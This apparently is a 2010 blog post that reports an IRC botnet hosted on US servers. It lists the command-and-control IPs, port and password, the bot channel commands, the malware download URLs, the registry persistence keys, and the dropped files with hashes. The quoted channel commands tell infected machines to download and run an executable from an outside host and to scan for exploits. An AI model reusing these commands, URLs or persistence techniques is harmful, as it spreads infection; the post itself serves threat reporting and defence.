98.126.44.98(Botnet hosted with kryptservers.com USA California)

By Pig, November 27, 2010

still USA hosting involved in Botnet hosting

Remote Host Port Number
208.53.183.219 80
208.53.183.73 80
208.53.183.92 80
98.126.44.98 8100 PASS laorosr ircd here

MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720]
@ -ix
MODE #dpi -ix

Joins channel: :#!
#! :.asc​-S|.http​ http://​208.53.1​83.217/u​se13.exe​|.asc ex​p_all 30​ 5 0 -a-​r -e|.as​c exp_al​l 30 5 0​ -b -r-e​|.asc ex​p_all30 ​5 0 -b|.​asc exp_​all 30 5​ 0 -c|.a​sc exp_a​ll 30 5 ​0 -a

nick [N00_USA_XP_4967390]
USER SP2-078 * 0 :COMPUTERNAME

Other details

* The following port was open in the system:

Port Protocol Process
1057 TCP cfdrive32.exe (%Windir%cfdrive32.exe)

* The data identified by the following URLs was then requested from the remote web server:
o http://208.53.183.219/serv6.exe
o http://208.53.183.73/foxjbewj._
o http://208.53.183.92/usa.exe

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
+ Taskman = “%AppData%oekx.exe”

so that oekx.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%cfdrive32.exe 339 968 bytes
9188.exe %Temp%9188.exe 339 968 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %AppData%oekx.exe
[file and pathname of the sample #1] 98 304 bytes MD5: 0x2FDB85B02FE089750F7F3B7183279012
SHA-1: 0xEF5BFE39F0E410E88D8171EE9BCB11578F29645D W32/Rimecud.gen.l [McAfee]
2 %Temp%474.exe 2 182 bytes MD5: 0xE193D9CE690D7FCD592FF6B92357783F
SHA-1: 0xA6FA1E134460D33E5DA411534C0969EBB99475B3 (not available)
3 %Temp%614988.exe 36 864 bytes MD5: 0xACF1E44740A7533C1C5A262D447FBCF2
SHA-1: 0x33D289CD1A03CA6449CF5D9E131784F2EAE9407C VirTool:Win32/Injector.T [Microsoft]
Virus.Win32.Injector [Ikarus]
4 %Temp%9188.exe
%Windir%cfdrive32.exe 167 936 bytes MD5: 0x6592DB13E7E8AD89991429A0CC6D5CEA
SHA-1: 0xB170F75E1428F8D2178D6883429FF5932B81344C W32/Rimecud.gen.m [McAfee]
Virus.Win32.Vitro [Ikarus]
5 %Windir%Tempscs1.tmp 2 686 bytes MD5: 0x4A587187D760161311010B03417B3C3F
SHA-1: 0x863BBF5F7F4114A1307C6BAD5DD89224D511FED5 (not available)

more info about the hoster here:
http://whois.domaintools.com/98.126.44.98
http://whois.domaintools.com/208.53.183.219

Categories: Uncategorized